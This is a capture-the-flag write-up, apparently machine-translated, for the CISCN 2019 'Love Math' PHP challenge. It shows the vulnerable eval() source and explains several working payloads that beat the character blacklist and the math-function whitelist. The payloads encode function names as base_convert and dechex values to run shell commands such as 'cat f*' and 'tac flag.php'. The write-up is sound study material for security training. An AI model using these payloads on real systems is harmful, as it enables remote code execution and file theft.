Table of Contents

Question record: [CISCN 2019 Preliminary Competition] Love Math

The link to reproduce the question: https://buuoj.cn /challenges
Reference link: 2019CISCN web question contest-JustSoSo;love_math (reproduction)
2019 National College Student Information Security Competition ciscn-writeup(4web)
CISCN2019Web WP

The environment of buu There is no flag, I really don’t know why, so I can only reproduce it locally.

The source code is as follows:

error_reporting(0);
//I heard that you like mathematics very much, I don’t know if you love it more than Love flag
if(!isset($_GET['c'])){
 show_source(__FILE__);
}else{
 //Example c=20-1< br /> $content = $_GET['c'];
 if (strlen($content) >= 80) {
 die("Too long will not count");
 }
 $blacklist = ['','\t','\r','\n','\'','"','`','\[','\]'] ;
 foreach ($blacklist as $blackitem) {
 if (preg_match('/'. $blackitem.'/m', $content)) {
 die("Please do not enter odd Strange characters");
 }
 }
 //Commonly used mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp
 $whitelist = ['abs','acos','acosh','asin','asinh','atan2','atan','atanh','base_convert','bindec','ceil','cos', ' cosh','decbin','dechex','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite' ,'is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec', ' pi','po w','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];
 preg_match_all('/[a -zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
 foreach ($used_funcs[0] as $func) {
 if (!in_array($func, $whitelist)) {
 die("Please do not enter weird functions");
 }
 }
 //Help you figure out the answer
 eval('echo'.$content.';');
}

It can be seen that it is a question of constructing rce, which is obtained after analysis and filtering What can be used: the mathematical functions in the whitelist, ., ^, etc., while the length is limited to 80 characters.
There are two ways of thinking. Be familiar with the characteristics of several php.

• Dynamic function
  In php, the function name can be passed to a variable in the form of a string, and then the function can be dynamically called through this variable
  For example: $function = "sayHello";$function();

• The function name in php is a string by default
  For example, asinh and pi in the whitelist of this question can be directly XORed, which increases the choice of constructing characters

Idea One

80 characters are relatively small, find a way to construct $_GET[1] and then pass the parameter getflag, but actually found the structure This seems more difficult. . . Because $, _, [, ] cannot be used, and GET must It is capitalized, and it is difficult to construct directly.
One kind of payload is like this
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs}) &pi=system&abs=tac flag.php
Analysis:

base_convert(37907361743,10,36) => "hex2bin"
dechex(1598506324) => "5f474554" 
$pi=hex2bin("5f474554") => $pi="_GET" //hex2bin converts a string of hexadecimal numbers into binary strings
($$pi){pi}(( $$pi){abs}) => ($_GET){pi}($_GET){abs} //{} can replace []

Another payload is like this
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
Analysis:

base_convert(696468 ,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//operation xx and yy, separated by a comma, echo can output
echo xx,yy

Since you can’t $_GET, then pass the header





Idea Two

It is also possible to find a way to catflag directly

//exec('hex2bin (dechex(109270211257898))') => exec(' cat f*')
($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//system('cat' .dechex(16)^asinh^pi) => system('cat *')
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi ))

Summary

The ctf is fun here, but unfortunately I’m too good at it. You must find the opportunity to learn php systematically and do the development yourself, so that it won’t be superficial.

Table of Contents

• Rewriting record: [CISCN 2019 Preliminary ]Love Math
  • Thinking one
  • Thinking two
  • Summary
• Timing record: [CISCN 2019 Preliminary] Love Math
  • Thinking one
  • Thinking two
  • Summary